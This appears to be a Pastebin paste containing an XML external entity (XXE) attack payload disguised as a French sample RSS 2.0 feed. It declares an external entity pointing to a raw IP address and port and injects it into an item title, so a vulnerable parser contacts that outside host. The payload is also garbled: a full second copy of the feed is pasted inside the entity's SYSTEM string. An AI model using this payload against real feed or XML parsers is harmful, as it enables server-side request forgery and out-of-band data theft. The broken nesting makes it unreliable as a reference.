totomatic

Untitled

Sep 19th, 2019
165
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.82 KB | None | 0 0
  1. <?xml version="1.0" encoding="ISO-8859-1"?>
  2. <!DOCTYPE foo [
  3. <!ENTITY xxe SYSTEM "<?xml version="1.0" encoding="ISO-8859-1"?>
  4. <!DOCTYPE foo [
  5. <!ENTITY xxe SYSTEM "http://34.249.38.231:1359/" >
  6. ]>
  7.  
  8. <rss version="2.0">
  9. <channel>
  10. <title>Mon site</title>
  11. <description>Ceci est un exemple de flux RSS 2.0</description>
  12. <lastBuildDate>Sat, 07 Sep 2002 00:00:01 GMT</lastBuildDate>
  13. <link>http://www.example.org</link>
  14. <item>
  15. <title>&xxe;</title>
  16. <description>Ceci est ma première actualité</description>
  17. <pubDate>Sat, 07 Sep 2002 00:00:01 GMT</pubDate>
  18. <link>http://www.example.org/actu1</link>
  19. </item>
  20. <item>
  21. <title>Actualité N°2</title>
  22. <description>Ceci est ma seconde actualité</description>
  23. <pubDate>Sat, 07 Sep 2002 00:00:01 GMT</pubDate>
  24. <link>http://www.example.org/actu2</link>
  25. </item>
  26. </channel>
  27. </rs" >
  28. ]>
  29.  
  30. <rss version="2.0">
  31. <channel>
  32. <title>Mon site</title>
  33. <description>Ceci est un exemple de flux RSS 2.0</description>
  34. <lastBuildDate>Sat, 07 Sep 2002 00:00:01 GMT</lastBuildDate>
  35. <link>http://www.example.org</link>
  36. <item>
  37. <title>&xxe;</title>
  38. <description>Ceci est ma première actualité</description>
  39. <pubDate>Sat, 07 Sep 2002 00:00:01 GMT</pubDate>
  40. <link>http://www.example.org/actu1</link>
  41. </item>
  42. <item>
  43. <title>Actualité N°2</title>
  44. <description>Ceci est ma seconde actualité</description>
  45. <pubDate>Sat, 07 Sep 2002 00:00:01 GMT</pubDate>
  46. <link>http://www.example.org/actu2</link>
  47. </item>
  48. </channel>
  49. </rss>
Advertisement
Add Comment
Please, Sign In to add comment